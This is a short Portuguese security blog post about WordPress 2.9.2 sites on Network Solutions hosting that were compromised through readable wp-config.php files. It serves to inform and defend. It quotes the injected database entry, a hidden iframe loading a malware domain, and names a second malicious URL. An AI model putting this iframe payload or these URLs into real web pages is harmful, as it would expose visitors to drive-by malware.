Blogues WordPress comprometidos no Network Solutions

Ontem foram publicados alguns alertas (Sucuri, NetworkSolutions, TechCocktail) de que o WordPress, mais propriamente a última versão 2.9.2, estaria vulnerável.

A razão deste alerta foram as centenas de blogues comprometidos e infectados com malware, principalmente em alojamentos do NetworkSolutions.

Hoje, o Sucuri em colaboração com o a equipa do NetworkSolutions, chegaram à conclusão que os incidentes ocorreram com a falta de permissões adequadas no ficheiro de configuração do WordPress (wp-config.php) e que um utilizador malicioso conseguiu aceder, num dos servidores do NetworkSolutions, aos dados de acesso da base de dados de cada cliente vulnerável e inseriu um iframe para um website com malware.

(2, 0, ‘siteurl’, ‘<iframe style=\”display:none\” height=\”0\” width=\” 1\” src=\”http://networkads.net/grep/\”></iframe>’, ‘yes’),

Na minha opinião a equipa do WordPress devia rever as regras de segurança numa instalação default.

Actualização (11-04-2010):

Também já foi identificado o mesmo ataque usando o endereço do iframe:

http://mainnetsoll.com/grep/

Achaste interessante? Partilha!
    Analista de segurança web com vários anos de experiência. Fundador do projeto WebSegura.net. Reconhecido publicamente, por divulgação de vulnerabilidades, por empresas como a Google, Adobe, eBay, Microsoft, Yahoo, Panda Security, AVG, Kaspersky, McAfee, Hootsuite e outros. Colabora regularmente com a comunicação social em temas relacionados com a segurança de informação.

    Que tal participar com o seu comentário?